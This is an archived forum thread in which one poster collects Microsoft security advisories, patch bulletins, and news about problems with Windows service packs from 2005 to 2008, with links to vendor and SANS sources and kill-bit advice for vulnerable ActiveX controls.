View Full Version : Microsoft Alerts


AplusWebMaster
2005-11-25, 19:47
FYI...good reason to be "selective" when doing "Windows Updates"...

- http://support.microsoft.com/?kbid=890830
Last Review: November 24, 2005
Revision: 15.2
"...Known issues in the November 8, 2005 release
When you run the November 8, 2005 release of the Windows Malicious Software Removal Tool from Windows Update, from Automatic Update, or from the Download Center, the tool may appear to stop responding. Additionally, you may experience one of the following symptoms:
• When you run the tool from Windows Update or from Automatic Update, Windows Task Manager shows that the Iexplore.exe process has high CPU usage.
• When you run the tool from the Download Center, Windows Task Manager shows that the Mrt.exe process has high CPU usage.
To resolve this issue, install the updated version of the Windows Malicious Software Removal Tool that is now available from Windows Update, from Microsoft Update, from Automatic Updates, or from the Download Center. An updated version of the Windows Malicious Software Removal Tool was released on November 11, 2005.
>>> http://tinyurl.com/83c52

:(

AplusWebMaster
2008-01-02, 19:54
FYI...

MS Office2003 SP3 disables older file formats
- http://it.slashdot.org/it/08/01/01/137257.shtml
January 02, 2008 - "In Service Pack 3 for Office 2003, Microsoft disabled support for many older file formats. If you have old Word, Excel, 1-2-3, Quattro, or Corel Draw documents, watch out! They did this because the old formats are 'less secure', which actually makes some sense, but only if you got the files from some untrustworthy source. Naturally, they did this by default, and then documented a mind-bogglingly complex workaround (KB 938810*) rather than providing a user interface for adjusting it, or even a set of awkward 'Do you really want to do this?' dialog boxes to click through. And of course because these are, after all, old file formats ... many users will encounter the problem only months or years after the software change, while groping around in dusty and now-inaccessible archives."
* http://support.microsoft.com/kb/938810/en-us
Last Review: December 6, 2007
Revision: 2.0

:nono::crazy:
------------------------------

- http://preview.tinyurl.com/2h5md8
January 05, 2008 (Computerworld) - "Microsoft Corp. apologized to a software rival yesterday for saying its file format posed a security risk and issued new tools to let users of Office 2003 SP3 unblock a host of barred file types. In a posting to his own blog*, David LeBlanc, a senior software development engineer with the Microsoft Office team, admitted the company's mistake in blaming insecure file formats, including the one used by CorelDraw... The revised support document** lists four downloads that users can run to unblock Word, Excel, PowerPoint and Corel files... "We'll try harder to make enabling older formats much more user-friendly in the future," he said."

* http://blogs.msdn.com/david_leblanc/archive/2008/01/04/office-sp3-and-file-formats.aspx
"...The .reg files you can use to change the security settings can be downloaded here..."

** http://support.microsoft.com/kb/938810/en-us
Last Review: January 4, 2008
Revision: 3.0
------------------------------
- http://preview.tinyurl.com/2gkwxt
January 10, 2008 (Computerworld) - "Microsoft Corp. will not post new tools that would allow users of Office 2007 to access blocked file formats, as it has done for customers running Office 2003 Service Pack 3 (SP3). It cited a lack of interest in such tools and said existing work-arounds accomplish the same thing... the Office Web site* explains how to set up a "trusted location," a special folder on a local or network drive. Files in a trusted folder aren't checked by Office 2007's security tools before opening, and thus the older file formats open normally..."
* http://office.microsoft.com/en-us/help/HA100319991033.aspx

:clown:

AplusWebMaster
2008-02-22, 15:15
FYI...

Vista SP1 Blocks AV Programs
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206801120
Feb. 21, 2008 - "A major update to Microsoft's Windows Vista operating system could leave computers vulnerable to hackers and malware as the service pack prevents several widely used antivirus programs from operating, the company said. The list of security products that Windows Vista Service Pack 1 blocks includes Zone Alarm Security Suite 7.1, Trend Micro Internet Security 2008, and BitDefender 10. It also blocks the 2008 version of the Jiangmin antivirus product. Microsoft said the blocks occur because the antivirus programs are not compatible with Vista SP1. "For reliability reasons, Microsoft blocks these programs from starting after you install Windows Vista SP1," the company said in a statement posted Wednesday on its support Web site*..."
* http://support.microsoft.com/kb/935796
Last Review: February 22, 2008
Revision: 3.0

:lip:

AplusWebMaster
2008-03-04, 13:58
FYI...

Vista SP1 Survival Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=205917537
March 4, 2008


.

AplusWebMaster
2008-03-21, 13:18
FYI...

Vista SP1 Chokes On Widely Used Intel Chipset Drivers
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=206904946
March 20, 2008 - "PCs from Hewlett-Packard, Gateway, Lenovo, and other major computer makers that contain a widely used Intel chipset can't be upgraded to Windows Vista Service Pack 1 if they're running certain drivers. Microsoft has said that Vista SP1 won't work with "a small number of device drivers." The list, however, includes drivers for an Intel chipset that's found in thousands of PCs and laptops. The affected chipset is Intel's 945G Express series, which is used in computers from virtually all major system vendors. It's also found on standalone motherboards sold by Asus. The 945G Express chipset driver versions between numbers 7.14.10.1322 and 7.14.10.1403 won't work with Vista SP1, according to Microsoft. Chipsets provide a connection point for all key subsystems within a PC. The 945G Express chipset includes Intel's GMA 950 graphics core, which also won't work with Vista SP1 if those drivers are used. Microsoft is urging Vista users to update all of their hardware to the latest drivers before even attempting to install SP1... The service pack also won't work with computers that use certain, widely-deployed audio drivers from Realtek and certain drivers for security devices manufactured by Symantec. Microsoft has published a full list of drivers that are incompatible with the service pack*. Meanwhile, Microsoft is continuing to receive reports from computer users who say Vista SP1 is wreaking havoc on their systems..."
* http://support.microsoft.com/?kbid=948343#method5
Last Review: March 20, 2008
Revision: 3.0

('Shades of the XPSP2 installs... 'Like Yogi said, "It's deja vu all over again"...)

:fear:

AplusWebMaster
2008-04-24, 17:34
FYI...

- http://preview.tinyurl.com/5vu4aw
April 23, 2008 (Infoworld) -"...Vista Service Pack 1 will download automatically to PCs that have the automatic update feature of the OS turned on, the company said. Previously, Vista was available to customers via Windows Update, but people had to specifically download it. Not all customers will receive SP1 immediately via Automatic Update, however. The company is distributing it in phases to "ensure a seamless download experience," Microsoft said. A timeline for when all customers would receive Vista SP1 via Automatic Update was not immediately available..."

- http://support.microsoft.com/?kbid=948343
Last Review: April 23, 2008
Revision: 7.0...

AplusWebMaster
2008-04-29, 21:16
FYI...

- http://isc.sans.org/diary.html?storyid=4358
Last Updated: 2008-04-29 17:03:11 UTC - "...the Windows Service Pack blocker tool can now block the following service packs from installation...
* Windows XP Service Pack 3 (valid for 12 months following general availability)
* Windows Vista Service Pack 1 (valid for 12 months following general availability)
So, if you want to prevent your machines from automatic updates (provided you don't use WSUS), you can download this handy tool from here*..."
* http://preview.tinyurl.com/2uryvq
Windows Service Pack Blocker Tool Kit
Quick Details
File Name: SPBlockerTools.EXE
Version: SPBlockerToolKit
Date Published: 12/6/2007
Language: English
Download Size: 96 KB

:spider:

AplusWebMaster
2008-05-06, 14:58
FYI...

Windows Vista SP1 Disaster Recovery Guide
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207402843
May 6, 2008


.

AplusWebMaster
2008-05-06, 23:48
FYI...

- http://isc.sans.org/diary.html?storyid=4387
Last Updated: 2008-05-06 20:10:06 UTC - "Microsoft, it appears, has just released Windows XP Service Pack 3*. For the most part, it is a bundle of all the updates since Service Pack 2, but there are some key differences.
First, the big gotcha:
- If you are an IE 6 user, SP3 will simply update your IE 6 installation. You will continue to be able to upgrade to IE 7 as an option.
- If you are an IE 7 user, it will update your IE 7 installation. HOWEVER, you will NOT be able to go back to IE 6 after applying this service pack.
- If you are an IE 8 (beta) user, you will need to uninstall IE 8, apply the service pack, and then reinstall IE 8.
This link** has a list of all the Knowledge Base articles that this service pack addresses. Some of the bigger notes are that it does retrofit some of the Vista functionality into XP, namely in the area of Network Access Protection, Black Hole Router Detection, enhanced security for administrator and service policy entries (basically some better default settings) and a kernel mode crypto driver. Additionally, some of the "optional" updates released since SP2 will be installed with SP3 (MMC 3.0, MSXML6, WPA2 support, etc). The good news is that TechNet provides installation media that can be used to slipstream install the service pack so workstations can be updated off the net."

Windows XP SP3 Network Installation Package for IT Professionals and Developers
* http://preview.tinyurl.com/6k9zo3
316.4 MB
"...Note: Customers running Microsoft Dynamics Retail Management System (RMS) are advised to install a hotfix for a Microsoft Dynamics RMS issue -prior- to installing Windows XP SP3. http://support.microsoft.com/kb/951937
DO NOT CLICK DOWNLOAD IF YOU ARE UPDATING JUST ONE COMPUTER: A smaller, more appropriate download is now available on Windows Update..."

Release notes for Windows XP Service Pack 3
** http://support.microsoft.com/kb/936929
Last Review: May 6, 2008
Revision: 5.0...

:fear:

AplusWebMaster
2008-05-09, 13:52
FYI...

XP SP3 crashes AMD machines
- http://www.theinquirer.net/gb/inquirer/news/2008/05/09/xp-sp3-crashes-amd-machines
9 May 2008 - "...Windows XP, Service Pack 3, is giving owners of machines with AMD hardware headaches aplenty it seems. The problems, which first arose just one day after the push, have been causing lots of noise on Microsoft support sites and angry user bogs. One user reported, "I just installed Windows XP SP3 and after completing the processes and when the system reboots, the system cannot proceed to load the Windows. It just displays the flash screen of Windows then after it reboots again." Angry users have also reported that, after the installation, it is not even possible to boot in safe mode, usually the last resort before setting up a repeated forehead/screen interface... there appear to be two separate problems. One affects only AMD-equipped PCs sold by Hewlett-Packard. "The problem is that HP, apparently along with other OEMs, deploys the same image to Intel-based computers that they do to AMD-based computers," said Johansson. "Because the image for both Intel and AMD is the same all have the intelppm.sys driver installed and running. That driver provides power management on Intel-based computers. On an AMD-based computer, amdk8.sys provides the same functionality." There's a whole bunch of other info and some useful fixes for those of you stuck in the dreaded loop of death over on Jesper's Bog*."
* http://preview.tinyurl.com/6zs52d
(MSinfluentials.com/blogs/jesper)

:sad::trample::thud:

AplusWebMaster
2008-05-20, 15:10
HP - AMD - XPSP3...

XP SP3 Upgrade Utility for systems with AMD processors
- http://preview.tinyurl.com/4g2b6y
Release Date: 2008-05-14 - Version: 1.0 (HP Customer Care)
Description: Microsoft Windows XP SP3 Upgrade Utility prevents continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Windows XP SP3 on systems with AMD processors.
Fixes: Prevents a condition from occurring that causes continuous system restarts or "Stop: 0x0000007E" errors after upgrading to Microsoft Windows XP Service Pack 3 on systems with an AMD processor.
Example: "A problem has been detected and Windows has been shut down to prevent damage to your computer..."

Download: sp37394.exe (1.85M)

.

AplusWebMaster
2008-05-21, 16:35
FYI...

XPSP3 chokes on ISP versions of IE7
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=207801330
May 20, 2008 - "Private label versions of Microsoft's Internet Explorer 7 browser, including those provided to customers by Internet Service Providers Comcast and Qwest, are prone to crash during installation on computers running Windows XP SP3 because they tend to be outdated, Microsoft is warning. The problem generally occurs when a so-called "branded" version of IE7 is installed for the first time on a computer that's running XP SP3, said Microsoft program manager Jane Maliouta, in a blog post*. "The reason is that the IE7 package you are trying to install uses old IE7 files," said Maliouta. The trouble? Some ISPs are still distributing versions of IE7 that don't contain updates designed to make the browser compatible with Windows XP SP3. Specifically, XP SP3 runs a version of an essential dynamic-link library file called XMLLite.dll that's not compatible with versions of IE7 released prior to October..."
* http://preview.tinyurl.com/6rwwf8
May 12, 2008 (blogs.msdn.com)

:fear:

AplusWebMaster
2008-05-29, 17:20
FYI...

- http://windowssecrets.com/comp/080529#patch0
2008-05-29 - "Antivirus software from Symantec Corp. may cause the installation of Service Pack 3 for XP to corrupt the Windows Registry by adding unnecessary keys.
Symantec advises users to disable the SymProtect security feature of its products before applying XP SP3.
A Registry fix is needed by the latest XP patch..."

(More detail at the URL above.)

:fear:

AplusWebMaster
2008-06-06, 13:20
FYI...

PCpitstop XPSP3 review:
- http://preview.tinyurl.com/4y7zqc
May 25, 2008 - Windows XP SP3 Issues and Fixes Continued


:sad:

AplusWebMaster
2008-06-20, 13:22
FYI...

MS08-030 - new patch, for XPSP2 & XPSP3
- http://isc.sans.org/diary.html?storyid=4600
Last Updated: 2008-06-20 01:20:41 UTC - "Microsoft issued a new patch, for XPSP2 & XPSP3, for MS08-030*: Vulnerability in Bluetooth stack could allow remote code execution. "Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update. Customers running Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 and all supported versions of Windows Vista who have already applied these original security updates do not need to take any further action"... The Technet Security Vulnerability Research & Defense blog** on the vulnerability was "MS08-030: All bark and no bite? The case of the Bluetooth update".
Related update - KB951376 Security Update for Windows XP:
http://support.microsoft.com/kb/951376/en-us ..."
Last Review: June 19, 2008
Revision: 2.0

* http://www.microsoft.com/technet/security/bulletin/ms08-030.mspx
Revisions:
• V1.0 (June 10, 2008): Bulletin published.
• V2.0 (June 19, 2008): Added "Why was this security update reoffered on June 19, 2008?" entry to the Update FAQ to advise customers running Windows XP Service Pack 2 and Windows XP Service Pack 3 that a revised version of the security update is available.
"...Customers who are running Windows XP Service Pack 2 and Windows XP Service Pack 3 should download and deploy this new security update..."

** http://preview.tinyurl.com/67t4uw
(blogs.technet.com)

:fear:

AplusWebMaster
2008-06-25, 14:59
FYI...

Microsoft Security Advisory (954462)
Rise in SQL Injection Attacks Exploiting Unverified User Data Input
- http://www.microsoft.com/technet/security/advisory/954462.mspx
June 24, 2008 - "Microsoft is aware of a recent escalation in a class of attacks targeting Web sites that use Microsoft ASP and ASP.NET technologies but do not follow best practices for secure Web application development. These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.
Mitigating Factors:
This vulnerability is not exploitable in Web applications that follow generally accepted best practices for secure Web application development by verifying user data input...
(See) Suggested Actions..."
• Detection – HP Scrawlr - http://preview.tinyurl.com/4qkk6g ...
• Defense – UrlScan - http://learn.iis.net/page.aspx/473/using-urlscan
• Identifying - Source Code Analyzer for SQL Injection - http://support.microsoft.com/kb/954476
• Additional Info...

Microsoft SQL Injection Prevention Strategy
- http://isc.sans.org/diary.html?storyid=4621
Last Updated: 2008-06-24 22:17:41 UTC - "...Microsoft recommends three approaches to help mitigate SQL Injection.
• Runtime scanning...
• URLScan...
• Code Scanning..."

- http://atlas.arbor.net/briefs/index#361782669
June 25, 2008 - "Microsoft today released security tools to help customers deal with SQL Injection Attacks. UrlScan, Microsoft Source Code Analyzer for SQL Injection and Scrawlr can be used by customers to check for SQL Injection issues in their applications.
Analysis: The release of these tools comes in a time when SQL injection is increasingly exploited. UrlScan is used to restrict HTTP requests that IIS will process."
* http://preview.tinyurl.com/5t2sbh
(blogs.technet.com)

:fear:

AplusWebMaster
2008-06-29, 14:24
FYI...

Device Manager may not show any devices and Network Connections may not show any network connections after you install Windows XP Service Pack 3 (SP3)
- http://support.microsoft.com/?kbid=953979
Last Review: June 25, 2008
Revision: -4.2-
SYMPTOMS:
After you install Windows XP Service Pack 3 (SP3), Device Manager may not show any devices and Network Connections may not show any network connections.
This problem may occur when an antivirus application is running during the installation of Windows XP SP3.
CAUSE
This problem occurs when the Fixccs.exe process is called during the Windows XP SP3 installation. This process creates some intermediate registry subkeys, and it later deletes these subkeys. In some cases, some antivirus applications may not let the Fixccs.exe process delete these intermediate registry subkeys.
When this problem occurs, certain applications, such as Device Manager and Network Connections, may be unable to enumerate the device or the connection instances. These applications will report a blank status even though devices and connections still function as expected.
RESOLUTION
Hotfix information:
The following file is available for download from the Microsoft Download Center:
Download the Update for Windows XP (KB953979) package now:
- http://preview.tinyurl.com/3jgjap
File Name: WindowsXP-KB953979-x86-ENU.exe
Download Size: 64 KB...
Prerequisites:
To use this hotfix, you must have Windows XP Service Pack 3 installed on the computer...
Restart requirement:
To apply this hotfix, you must restart the computer in Safe Mode..."

Steps to take -before- you install Windows XP Service Pack 3
- http://support.microsoft.com/kb/950717/
Last Review: May 21, 2008 - Revision: 3.0 - "...Important
• If the configuration of your antivirus software prevents certain system files from being changed, the Windows XP SP3 installation may fail. Try temporarily disabling your antivirus software. To do this, right-click your antivirus program icon, and then click Disable. This icon typically appears in the lower right corner of the computer screen.
• If you disable your antivirus software before you install Windows XP SP3, make sure that you know the risks that are involved, and make sure that you enable the antivirus software after Windows XP SP3 is installed..."

:fear:

AplusWebMaster
2008-07-01, 13:52
FYI...

Microsoft Security Advisory (954960)
Microsoft Windows Server Update Services (WSUS) Blocked from Deploying Security Updates
- http://www.microsoft.com/technet/security/advisory/954960.mspx
June 30, 2008 - "Microsoft is investigating public reports of a non-security issue that prevents the distribution of any updates deployed through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1 to client systems that have Microsoft Office 2003 installed in their environment. Microsoft is aware of reports from customers who are experiencing this issue. Upon completing the investigation, Microsoft will take appropriate action to resolve the issue within Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1.

Note: The issue affecting System Center Configuration Manager 2007 first described in Microsoft Security Advisory 954474, where System Center Configuration Manager 2007 systems were blocked from deploying security updates, is separate from the issue described in this advisory.
Mitigating Factors:
• This issue is limited to customers who deploy updates through Microsoft Windows Server Update Services 3.0 or Microsoft Windows Server Update Services 3.0 Service Pack 1, and have Microsoft Office 2003 installed in their environments..."

- http://preview.tinyurl.com/6xdp79
June 30, 2008 (MSRC blog)

:fear::spider:

AplusWebMaster
2008-07-08, 00:15
FYI...

Microsoft Security Advisory (955179)
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
- http://www.microsoft.com/TechNet/security/advisory/955179.mspx
July 7, 2008 - "Microsoft is investigating active, targeted attacks leveraging a potential vulnerability in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. The ActiveX control for the Snapshot Viewer for Microsoft Access enables you to view an Access report snapshot without having the standard or run-time versions of Microsoft Office Access. The vulnerability only affects the ActiveX control for the Snapshot Viewer for Microsoft Office Access 2000, Microsoft Office Access 2002, and Microsoft Office Access 2003. The ActiveX control is shipped with all supported versions of Microsoft Office Access except for Microsoft Office Access 2007. The ActiveX control is also shipped with the standalone Snapshot Viewer...
Suggested Actions / Workarounds:
Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, this is stated in the entry.
• Prevent COM objects from running in Internet Explorer
You can disable attempts to instantiate a COM object in Internet Explorer by setting the kill bit for the control in the registry..."

(Kill bit listings shown in the advisory at the URL above.)

:fear:

AplusWebMaster
2008-07-08, 22:00
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-jul.mspx
July 8, 2008 - "This bulletin summary lists security bulletins released for July 2008...

Important (4)

Microsoft Security Bulletin MS08-040
Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
- http://www.microsoft.com/technet/security/bulletin/ms08-040.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows, Microsoft SQL Server...

Microsoft Security Bulletin MS08-038
Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-037
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Spoofing...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-039
Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
- http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Elevation of Privilege...
Affected Software: Microsoft Windows...

-
ISC Analysis
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
---

MS08-038 exploit/fix available
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-08 18:22:23 UTC
"...MS08-038 - Multiple vulnerabilities in Windows explorer allow code execution with the rights of the logged on user... Publicly disclosed... CVE-2008-0951* is a well known vulnerability: CERT VU#889747** (March 2008)..."
- http://www.microsoft.com/technet/security/bulletin/ms08-038.mspx
July 8, 2008
* http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
Last revised: 3/25/2008
** http://www.kb.cert.org/vuls/id/889747
First Published 03/20/2008
---
Updated / CVE references:
- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
MS08-037: Windows DNS
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1447
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1454
MS08-038: Windows explorer / Vista
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1435
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0951
MS08-039: Exchange server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2247
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2248
MS08-040: SQL server
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0085
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0086
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0106
- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0107

//

:fear:

AplusWebMaster
2008-07-09, 05:55
FYI... updated:

- http://isc.sans.org/diary.html?storyid=4684
Last Updated: 2008-07-09 08:21:40 UTC ...(Version: 3)
"...MS08-037 - Windows DNS ...ZoneAlarm users report* trouble with their firewall set to "high" for the Internet zone..."

Update - Important! - see: http://forums.spybot.info/showpost.php?p=211128&postcount=78 -prior- to MS08-037 install.

* http://support.microsoft.com/?kbid=951748
MS08-037 ...Windows XP... (client side)

//

AplusWebMaster
2008-07-09, 22:54
FYI...

- http://www.theinquirer.net/gb/inquirer/news/2008/07/09/windows-xp-sp3-automatic
9 July 2008 - "AS ANNOUNCED previously by Microsoft, automatic updates for Windows XP SP3 will be launched Wednesday, July 10 2008, starting at 10:00 am Pacific Time. For most Windows XP users who haven't already manually downloaded and applied SP3, the automatic update process should work properly. After all, Microsoft has had almost three months to test, tweak and polish it since it was first released. Microsoft's Automatic Updates process should know about and scan for configurations that are problematic, and prevent the Windows XP SP3 update installation process from proceeding if it detects a troublesome situation. However, if there's any hiccough in the automatic update process, your computer could become unusable. Therefore, certain technical advisors recommend using Microsoft's Automatic Updates facility only to provide notification that the update is available, then applying it manually. They caution that you should also take care to follow Microsoft's service pack pre-installation instructions, including:
* Disable antivirus programs,
* Make sure no other applications are running,
* Have your system plugged in during the update, that is, not on battery power, and
* Make sure that you have sufficient free space available on your system's hard disk.
You can make certain that the Windows Automatic Update facility doesn't attempt to, er... automatically update your system by using Microsoft's Windows Service Pack Blocker Tool Kit, and that's available here: http://preview.tinyurl.com/2tadkt
Should you find that Windows XP SP3 causes problems on your system, instructions on how to remove it are available here: http://www.iaps.com/blog/2008/07/how-to-remove-windows-xp-service-pack-3.html ..."

//

AplusWebMaster
2008-07-11, 05:54
FYI...

- http://blogs.technet.com/msrc/archive/2008/07/10/revision-for-ms08-037.aspx
July 10, 2008 (MSRC) - "...After the release of MS08-037, we became aware of reports of ZoneAlarm customers experiencing issues after applying the security updates. We started investigating these reports as soon as we heard about them and have been working to research this issue. We’re still working on this issue but we do have some information from our investigation so far, which we’ve put into the bulletin. Specifically, we’ve identified that customers who are running either ZoneAlarm or Check Point Endpoint Security (previously named Check Point Integrity) who apply MS08-037 may lose network connectivity after applying these updates. Our investigation so far has shown that no other customers are affected by this issue. We’re still investigating this issue but we encourage customers who are using ZoneAlarm to review the appropriate ZoneAlarm Web site** and Check Point Endpoint customers to review the appropriate Check Point Web site*** for the latest guidance or software updates and factor this information into your risk assessment, testing, and deployment planning..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
• V2.0 (July 10, 2008): Bulletin revised to inform users of ZoneAlarm and Check Point Endpoint Security of an Internet connectivity issue detailed in the section, Frequently Asked Questions (FAQ) Related to this Security Update. The revision did -not- change the security update files in this bulletin, but users of ZoneAlarm and Check Point Endpoint Security should read the FAQ entries for guidance.

** http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html
Last Revised : 14 July 2008

*** https://supportcenter.checkpoint.com/supportcenter/index.jsp

//

AplusWebMaster
2008-08-02, 04:12
FYI...

- http://securitylabs.websense.com/content/Blogs/3148.aspx
08.01.2008 - "...We've been closely monitoring this exploit since its release, and are now tracking several hundred occurrences in the wild, found mostly in China. There is currently no patch available, but Microsoft has several workarounds listed in their advisory. We recommend setting the killbit for this ActiveX control on all workstations where it is installed.
Vulnerable ActiveX CLSIDs:
* F0E42D50-368C-11D0-AD81-00A0C90DC8D9
* F0E42D60-368C-11D0-AD81-00A0C90DC8D9
* F2175210-368C-11D0-AD81-00A0C90DC8D9
This vulnerability is a simple design flaw, and does not require any complicated exploit code. Attackers are able to compromise remote systems simply by calling methods provided by the Snapshot Viewer ActiveX control. This is very similar to the November 9, 2005 ADODB.Stream vulnerability, which was widely taken advantage of because it was easy to exploit. Luckily, the vulnerable ActiveX control does NOT appear in a default Microsoft Windows installation. It does appear, however, to be included by default with Microsoft Office 2000 - 2003."

- http://www.symantec.com/security_response/threatconlearn.jsp
"The ThreatCon is at level 2. On August 1, 2008, a new attack vector for the Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID 30114) was identified being exploited in the wild. This vulnerability is currently unpatched. Microsoft Access ActiveX Control Arbitrary File Download Vulnerability ( http://www.securityfocus.com/bid/30114 ) Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access ( http://www.microsoft.com/technet/security/advisory/955179.mspx ) The new attack vector allows an attacker to install a vulnerable version of the ActiveX control on target systems that did not originally contain the associated software. This is possible because the control is digitally signed and marked safe for scripting by Microsoft. This is known to affect users of Internet Explorer 6. Note that Internet Explorer 7 requires user interaction to confirm the installation of the ActiveX control. As a result of this discovery, we urge all Microsoft Windows users, even those whose systems do not currently have the vulnerable control installed, to set the kill bit on the three CLSIDs associated with Snapshot Viewer.
F0E42D50-368C-11D0-AD81-00A0C90DC8D9
F0E42D60-368C-11D0-AD81-00A0C90DC8D9
F2175210-368C-11D0-AD81-00A0C90DC8D9
For instructions on how to set the kill bit on an ActiveX control, please see the following article: Microsoft Knowledge Base Article 240797 (Microsoft) Microsoft ( http://support.microsoft.com/kb/240797 )."

:fear:

AplusWebMaster
2008-08-12, 23:46
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms08-aug.mspx
August 12, 2008 - "This bulletin summary lists security bulletins released for August 2008..." (Total 11)

Critical (6)

Microsoft Security Bulletin MS08-046
Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution (952954)
- http://www.microsoft.com/technet/security/bulletin/MS08-046.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-045
Cumulative Security Update for Internet Explorer (953838)
- http://www.microsoft.com/technet/security/bulletin/MS08-045.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows, Internet Explorer...

Microsoft Security Bulletin MS08-041
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
- http://www.microsoft.com/technet/security/bulletin/MS08-041.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-043
Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066)
- http://www.microsoft.com/technet/security/bulletin/MS08-043.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-051
Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785)
- http://www.microsoft.com/technet/security/bulletin/MS08-051.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Microsoft Security Bulletin MS08-044
Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090)
- http://www.microsoft.com/technet/security/bulletin/MS08-044.mspx
Maximum Severity Rating: Critical
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

Important (5)

Microsoft Security Bulletin MS08-047
Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733)
- http://www.microsoft.com/technet/security/bulletin/MS08-047.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-049
Vulnerabilities in Event System Could Allow Remote Code Execution (950974)
- http://www.microsoft.com/technet/security/bulletin/MS08-049.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS08-048
Security Update for Outlook Express and Windows Mail (951066)
- http://www.microsoft.com/technet/security/bulletin/MS08-048.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Outlook Express, Windows Mail...

Microsoft Security Bulletin MS08-050
Vulnerability in Windows Messenger Could Allow Information Disclosure (955702)
- http://www.microsoft.com/technet/security/bulletin/MS08-050.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Information Disclosure...
Affected Software: Microsoft Windows, Windows Messenger...

Microsoft Security Bulletin MS08-042
Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048)
- http://www.microsoft.com/technet/security/bulletin/MS08-042.mspx
Maximum Severity Rating: Important
Impact of Vulnerability: Remote Code Execution...
Affected Software: Microsoft Office...

---

ISC Analysis
- http://isc.sans.org/diary.html?storyid=4876
Last Updated: 2008-08-12 19:06:35 UTC

---
Revised (4):

Microsoft Security Bulletin MS08-022 – Critical
Vulnerability in VBScript and JScript Scripting Engines Could Allow Remote Code Execution (944338)
- http://www.microsoft.com/technet/security/Bulletin/MS08-022.mspx
